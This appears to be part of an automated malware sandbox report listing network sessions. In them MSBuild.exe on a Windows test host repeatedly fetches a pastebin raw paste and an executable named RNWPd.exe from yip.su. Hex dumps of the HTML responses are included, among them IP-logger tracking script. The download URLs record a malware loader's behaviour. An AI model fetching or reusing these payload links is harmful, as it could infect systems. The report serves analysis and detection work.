                    2024-09-16 19:23:06 UTC1369INData Raw: 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65
                    Data Ascii: <style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;borde
                    2024-09-16 19:23:06 UTC1369INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64
                    Data Ascii: px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id
                    2024-09-16 19:23:06 UTC158INData Raw: 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: tyle.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:23:06 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    51192.168.2.649781104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:11 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:23:11 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433ac73a2f4331-EWR
                    2024-09-16 19:23:11 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:23:11 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:23:11 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:23:11 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:23:11 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    52192.168.2.649782188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:12 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:23:12 UTC898INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:23:12 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:23:12 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cM2cPHPHBDwIvEoaTJPVrhDbC%2Fy6hdLWhelNRkt04286SS1S%2Bh7DuqHh34ZfB2vL77IgWk9rN2lP1UpvEWgrWyK9i2fQfFEDSf7Itkqdeq9UySbqJ6fw9Fs%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c433acb4b174339-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:23:12 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:23:12 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                    Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
                    2024-09-16 19:23:12 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                    Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                    2024-09-16 19:23:12 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
                    Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                    2024-09-16 19:23:12 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
                    Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                    2024-09-16 19:23:12 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                    Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                    2024-09-16 19:23:12 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:23:12 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    53192.168.2.649783104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:17 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:23:17 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433aeb9cd44252-EWR
                    2024-09-16 19:23:17 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:23:17 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:23:17 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:23:17 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:23:17 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    54192.168.2.649784188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:18 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:23:18 UTC899INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.42901611328125
                    expires: Mon, 16 Sep 2024 19:23:18 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:23:18 GMT
